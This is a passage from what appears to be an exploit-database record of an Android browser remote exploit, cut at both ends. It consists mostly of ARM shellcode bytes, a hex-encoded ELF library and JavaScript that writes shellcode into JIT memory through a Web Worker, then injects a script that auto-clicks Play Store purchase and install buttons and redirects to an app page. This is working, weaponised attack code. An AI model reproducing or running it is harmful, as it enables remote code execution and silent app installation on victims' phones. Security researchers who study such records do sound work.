0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];\r\nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000\";\r\nvar arrayBuffer = new ArrayBuffer(0x1000000);\r\nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1;\r\nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4);\r\nvar args_address = backingStoreAddress+1024;\r\nfunction write_shellcode(dlsym_addr,buffer){\r\n //ldr r0,[pc,4]//0xe59f0004 \r\n //ldr r1,[pc,4]//0xe59f1004\r\n //b shellcode;//0xea000001\r\n //dlopen_addr//array_buffer_address\r\n //dlsym_addr\r\n //shellcode\r\n //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];\r\n var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];\r\n for(var i=0;i<stub.length;i++){\r\n globaldv[buffer/4+i]=stub[i];\r\n }\r\n\r\n shellcode = shellcode.concat([0,0,0,0]);\r\n for(var i=0;i<shellcode.length/4>>>0;i++){\r\n // u8arr[i+4*stub.length]=shellcode[i];\r\n globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);\r\n }\r\n return stub.length*4+shellcode.length;\r\n}\r\n\r\nfunction xss_code(){\r\n //alert(navigator.userAgent);\r\n //alert(document.cookie);\r\n var i1=setInterval(function(){\r\n if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){\r\n console.log(\"wait load complete\");\r\n return;\r\n }\r\n clearInterval(i1);\r\n var i2=setInterval(function(){\r\n document.getElementsByClassName(\"price buy id-track-click\")[0].click();\r\n var installButton = document.getElementById(\"purchase-ok-button\");\r\n if(installButton == null)\r\n return;\r\n installButton.click();\r\n document.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\");\r\n clearInterval(i2);\r\n setTimeout(function(){\r\n window.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\");\r\n },26000);\r\n },500);\r\n },500);\r\n}\r\n\r\nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\";\r\n//var backup_arr = backup_original_code(huge_func_code_entry);\r\nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);\r\nvar args_view = new DataView(arrayBuffer,1024,100);\r\nvar so_file_view = new DataView(arrayBuffer,4096);\r\nvar js_view = new DataView(arrayBuffer,0x100000);\r\nargs_view.setUint32(0,dlsym_addr+0xc,true);\r\nargs_view.setUint32(4,dlsym_addr,true);\r\nargs_view.setUint32(8,huge_func_code_entry,true);\r\nargs_view.setUint32(12,writed_len,true);\r\nargs_view.setUint32(16,backingStoreAddress+4096,true);\r\nargs_view.setUint32(20,so_str.length/2,true);\r\nargs_view.setUint32(24,backingStoreAddress+0x100000,true);\r\nargs_view.setUint32(28,js_str.length,true);\r\nprint(\"length is \"+so_str.length);\r\nfor(var i=0;i<so_str.length;i+=2){\r\n var value = so_str.substr(i,2);\r\n value = \"0x\"+value;\r\n so_file_view.setUint8(i/2,parseInt(value));\r\n}\r\nfor(var i=0;i<js_str.length;i++){\r\n js_view.setUint8(i,js_str.charCodeAt(i));\r\n}\r\n\r\nprint(\"begin execute shellcode\");\r\nhuge_func({});\r\n\r\nprint(\"done\");\r\npostMessage(true);\r\n//prevent arrayBuffer to be released\r\nwhile(1){}\r\n\r\n}\r\n//main world\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");\r\n}\r\n\r\n// Build a worker from an anonymous function body\r\nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );\r\n\r\nvar worker;\r\nvar exploitSucc = false;\r\nvar count = 0;\r\nfunction startExploit(){\r\n print(\"worker thread is started\");\r\n worker = new Worker( blobURL );\r\n count++;\r\n worker.onmessage = function(e){\r\n print(\"exploit result is \"+e.data);\r\n exploitSucc = e.data;\r\n if(exploitSucc==false){\r\n startExploit();\r\n return;\r\n }\r\n var end = +new Date();\r\n print(\"time diff is \"+(end-begin)/1000);\r\n //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';\r\n top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';\r\n }\r\n}\r\nvar begin = +new Date();\r\nstartExploit();\r\n\r\nvar savedCount = 0;\r\nvar hangMonitor = setInterval(function (){\r\n if(exploitSucc==true){\r\n clearInterval(hangMonitor);\r\n }else{\r\n if(savedCount==count){//maybe hang\r\n print(\"worker maybe hange\");\r\n worker.terminate();\r\n startExploit();\r\n }else{\r\n print(\"worker is normal\");\r\n savedCount = count;\r\n }\r\n }\r\n},10000);\r\n//URL.revokeObjectURL( blobURL );\r\n\r\n\r\n</script>\r\n</html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42175/"}], "zdt": [{"lastseen": "2018-04-09T13:37:24", "bulletinFamily": "exploit", "description": "Exploit for Android platform in category remote exploits", "modified": "2017-06-14T00:00:00", "published": 